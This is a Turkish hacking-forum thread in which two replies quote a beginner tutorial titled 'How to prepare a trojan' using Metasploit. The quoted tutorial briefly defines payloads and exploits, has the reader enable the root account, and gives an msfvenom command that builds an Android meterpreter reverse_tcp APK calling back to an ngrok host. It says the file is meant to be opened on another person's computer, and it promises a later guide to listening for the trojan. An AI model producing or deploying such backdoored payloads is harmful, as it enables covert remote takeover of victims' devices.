Başlangıç Nasıl Yapılır / Metasploit Nedir / Nasıl Trojan Hazırlanır /

olympos_

olympos_

Katılımcı Üye
3 Nis 2022
554
163
MemoryTiger' Alıntı:
logo.png





>> Öncelikle Bunu Yapabilmemiz İçin Linux İşletim Sistemine Sahip Olmamız Gerekmektedir.


>> Bunun İçinde Sanal Makineye İhtiyacımız var.


>> Virtual Box / VMware workstation 15 adlı sanal makine linux işletim sistemi kurma videolarını izleyerek linux işletim sistemine sahip olabilirsiniz.


>> Linux kurduktan sonra girilmesi gereken kodları bu videodan inceleyebilirsiniz.


LİNUX GİRİLMESİ GEREKEN KODLAR



GELELİM ASIL KONUYA






pwjwnms.png



Metasploit Nedir ?


>> Çeşitli backdoorlu dosyalar yapıp bunlar ile de hedef sisteme saldırı gerçekleştiririz.
>> Kısacası Bir Exe dosyası oluşturarak karşı tarafın bilgisayarında açmamız gerekmektedir.



1.png





3dlnd7g.png



Payload Nedir ?

>> Hedef sisteme erişim sağlanırken hedef makinenin hafızasına yüklenilerek, bilgisayara sızan hackerın istediği komutları yapmasını sağlar.



1.png





nb1qujg.png



Exploit Nedir ?

>> Hedef sistemde çalışan servis ya da uygulamaların zayıflıklarını kullanarak amaçlara ulaşmak için kullanılan güvenlik açıklarıdır.




Konuya Başlamadan Önce



>> Öncelikle benim size uyguladığım adımlardan bahsetmeliyim.


>> Port açmayı denedim ancak modemim bunu karşılamıyordu eminim ki sizin de öyledir port açmayı denediniz ancak çoğunuzda başarısız oldu. İşte bunun için buradayım :)


>> Gelelim Trojan Hazırlamaya


>> Öncelikle Root izinli Bir linux işletim sistemine ihtiyacımız var


>> Bunun İçin Terminale dediklerimi yazmalısınız.



sudo passwd root


>> Ardından karşınıza onay için şifrenizi isteyecek.


>> ve yeni parola oluşturmanız istenicek







>> Ben root sistemi olduğum için sudo yazmama gerek yok merak etmeyin artık sizde sudo komutundan kurtulacaksınız.


>> evet , artık şifreniz değişti


>> şimdi sanal makinemizi yeniden başlatalım.


>> karşımıza çıkan kullanıcı adı şifre ekranına



kullanıcı adı = root


şifre = sizin belirlediğiniz



>> Evet artık rootdasınız :)




ffgwjmc.png



Nasıl Trojan Hazırlanır ?



Evet,Asıl Sıkıntı Yere geldik Canızı Sıkmayın Bunuda Halledicez. :)) <3
Öncelikle yaptığım adımları birebir uygularsanız hata çıkmaz çıkarsa yorum olarak yazın yardımcı olmaya çalışırım.


>> Bunun için terminale ihtiyacımız var








msfvenom -p android/meterpreter/reverse_tcp set LHOST=sizin ngrok hostunuz LPORT=ngrokun verdiği port -o /root/Masaüstü/deneme3.apk


enterlıyoruz








Evet, trojanımız oluştu :)







KONUNUN DEVAMI GELECEKTİR.
BAŞKA KONULAR AÇIP O KONUNUN LİNKİNİ BURAYA KOYACAĞIM. ( SÖZÜMÜ TUTTUM :)) ))
PORT OLUŞTURMA VE TROJANI DİNLEME
ORADAN DEVAM EDİCEKSİNİZ :)



tm6syrc.png





İYİ FORUMLAR
SAĞLICAKLA

Genişletmek için tıkla ...
Root yetkisine sahip bir sistem demişsiniz acaba sudo su yazsak ve öyle root yetkisine sahip olsak yeterli değilmi
Elinize sağlık
 
Cinco

Cinco

Üye
3 Ara 2020
94
51
MemoryTiger' Alıntı:
logo.png





>> Öncelikle Bunu Yapabilmemiz İçin Linux İşletim Sistemine Sahip Olmamız Gerekmektedir.


>> Bunun İçinde Sanal Makineye İhtiyacımız var.


>> Virtual Box / VMware workstation 15 adlı sanal makine linux işletim sistemi kurma videolarını izleyerek linux işletim sistemine sahip olabilirsiniz.


>> Linux kurduktan sonra girilmesi gereken kodları bu videodan inceleyebilirsiniz.


LİNUX GİRİLMESİ GEREKEN KODLAR



GELELİM ASIL KONUYA






pwjwnms.png



Metasploit Nedir ?


>> Çeşitli backdoorlu dosyalar yapıp bunlar ile de hedef sisteme saldırı gerçekleştiririz.
>> Kısacası Bir Exe dosyası oluşturarak karşı tarafın bilgisayarında açmamız gerekmektedir.



1.png





3dlnd7g.png



Payload Nedir ?

>> Hedef sisteme erişim sağlanırken hedef makinenin hafızasına yüklenilerek, bilgisayara sızan hackerın istediği komutları yapmasını sağlar.



1.png





nb1qujg.png



Exploit Nedir ?

>> Hedef sistemde çalışan servis ya da uygulamaların zayıflıklarını kullanarak amaçlara ulaşmak için kullanılan güvenlik açıklarıdır.




Konuya Başlamadan Önce



>> Öncelikle benim size uyguladığım adımlardan bahsetmeliyim.


>> Port açmayı denedim ancak modemim bunu karşılamıyordu eminim ki sizin de öyledir port açmayı denediniz ancak çoğunuzda başarısız oldu. İşte bunun için buradayım :)


>> Gelelim Trojan Hazırlamaya


>> Öncelikle Root izinli Bir linux işletim sistemine ihtiyacımız var


>> Bunun İçin Terminale dediklerimi yazmalısınız.



sudo passwd root


>> Ardından karşınıza onay için şifrenizi isteyecek.


>> ve yeni parola oluşturmanız istenicek







>> Ben root sistemi olduğum için sudo yazmama gerek yok merak etmeyin artık sizde sudo komutundan kurtulacaksınız.


>> evet , artık şifreniz değişti


>> şimdi sanal makinemizi yeniden başlatalım.


>> karşımıza çıkan kullanıcı adı şifre ekranına



kullanıcı adı = root


şifre = sizin belirlediğiniz



>> Evet artık rootdasınız :)




ffgwjmc.png



Nasıl Trojan Hazırlanır ?



Evet,Asıl Sıkıntı Yere geldik Canızı Sıkmayın Bunuda Halledicez. :)) <3
Öncelikle yaptığım adımları birebir uygularsanız hata çıkmaz çıkarsa yorum olarak yazın yardımcı olmaya çalışırım.


>> Bunun için terminale ihtiyacımız var








msfvenom -p android/meterpreter/reverse_tcp set LHOST=sizin ngrok hostunuz LPORT=ngrokun verdiği port -o /root/Masaüstü/deneme3.apk


enterlıyoruz








Evet, trojanımız oluştu :)







KONUNUN DEVAMI GELECEKTİR.
BAŞKA KONULAR AÇIP O KONUNUN LİNKİNİ BURAYA KOYACAĞIM. ( SÖZÜMÜ TUTTUM :)) ))
PORT OLUŞTURMA VE TROJANI DİNLEME
ORADAN DEVAM EDİCEKSİNİZ :)



tm6syrc.png





İYİ FORUMLAR
SAĞLICAKLA

Genişletmek için tıkla ...
Ellerine sağlık.
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.